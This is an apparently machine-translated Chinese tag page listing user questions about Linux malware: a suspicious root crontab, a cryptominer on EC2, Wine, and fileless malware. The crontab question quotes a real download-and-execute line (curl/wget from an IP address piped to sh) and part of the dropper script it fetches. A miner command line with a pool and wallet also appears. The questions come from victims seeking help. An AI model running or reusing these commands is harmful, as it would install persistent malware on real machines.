我的 Linux 机器是否有可能感染恶意软件?
我没有听说过它发生在我认识的任何人身上,而且我听说过很多次这是不可能的。真的吗?
如果是这样,Linux Anti-Virus(安全)软件是怎么回事?
我想在我的 Raspberry Pi 上的根 crontab 文件中添加一些内容,但发现一个对我来说似乎很可疑的条目,在谷歌上搜索它的一部分没有发现任何内容。
Crontab 条目:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
Run Code Online (Sandbox Code Playgroud)
内容为http://103.219.112.66:8000/i.sh:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export …Run Code Online (Sandbox Code Playgroud) 最近在运行 Linux 的机器上闯入后,我在用户的主文件夹中发现了一个具有弱密码的可执行文件。我已经清理了所有损坏的地方,但我正在准备彻底擦拭以确保。
由非 sudo 或非特权用户运行的恶意软件可以做什么?是否只是在寻找标有世界可写权限的文件进行感染?非管理员用户可以在大多数 Linux 系统上做哪些具有威胁性的事情?您能否提供一些此类安全漏洞可能导致的现实世界问题的示例?
我在我的 ec2 实例上发现了恶意软件,它不断挖掘比特币并使用我的实例处理能力。我成功识别了该进程,但无法删除并终止它。
我运行了这个命令
watch "ps aux | sort -nrk 3,3 | head -n 5"
它显示了在我的实例上运行的前五个进程,从中我发现有一个进程名称“ bashd ”,它消耗了 30% 的 cpu。过程是
bashd -a cryptonight -o stratum+tcp://get.bi-chi.com:3333 -u 47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG -p x
Run Code Online (Sandbox Code Playgroud)
我使用kill -9 process_id命令终止了这个进程。5 秒后,该过程再次开始。
只是想知道安装 Wine 是否会为 Windows 病毒世界打开一个相当可靠的 Linux 桌面。有没有相关证实的报道?
那么您会在 Wine 下安装 Windows 防病毒产品吗?
这是我在 Nethogs 中看到的:

我担心带有 PID 的列表?,作为root. 我怎样才能知道这些是什么?我正在运行 Linux Mint 14。
请让我知道我应该包括哪些其他信息。
我最近(重新)偶然发现了这个:
是的,我知道从不受信任的来源添加一些随机 PPA/软件是在自找麻烦(或更糟)。我从不这样做,但很多人这样做(许多 Linux 博客和小报都提倡为花哨的应用程序添加 PPA,而没有警告它可能会破坏您的系统或更糟的是,危及您的安全。)
如何检测和删除特洛伊木马或流氓应用程序/脚本?
我理解无文件恶意软件的定义:
不基于文件而仅存在于内存中的恶意代码……更具体地说,无文件恶意代码……将自身附加到内存中的活动进程中……
有人可以解释一下这个附加到内存中的活动进程是如何工作的吗?
此外,针对此类攻击有哪些(内核)保护/强化可用?
我最近在 Windows 上摆脱了一个讨厌的木马,并想迁移到 Linux(Ubuntu)。我想运行 Live CD,以便我可以格式化 SD 卡以将我的全新固件放在我的路由器上并格式化 HDD,以便我可以安装 Ubuntu。在这种情况下,是否有可能感染我的系统或感染 SD 卡?我提到我的 Windows 7 是正版许可证,也是我的 nod32,但我不相信我的病毒已经消失的事实。
malware ×10
security ×6
process ×2
cron ×1
emulation ×1
gui ×1
kill ×1
linux ×1
linux-kernel ×1
linux-mint ×1
networking ×1
ubuntu ×1
windows ×1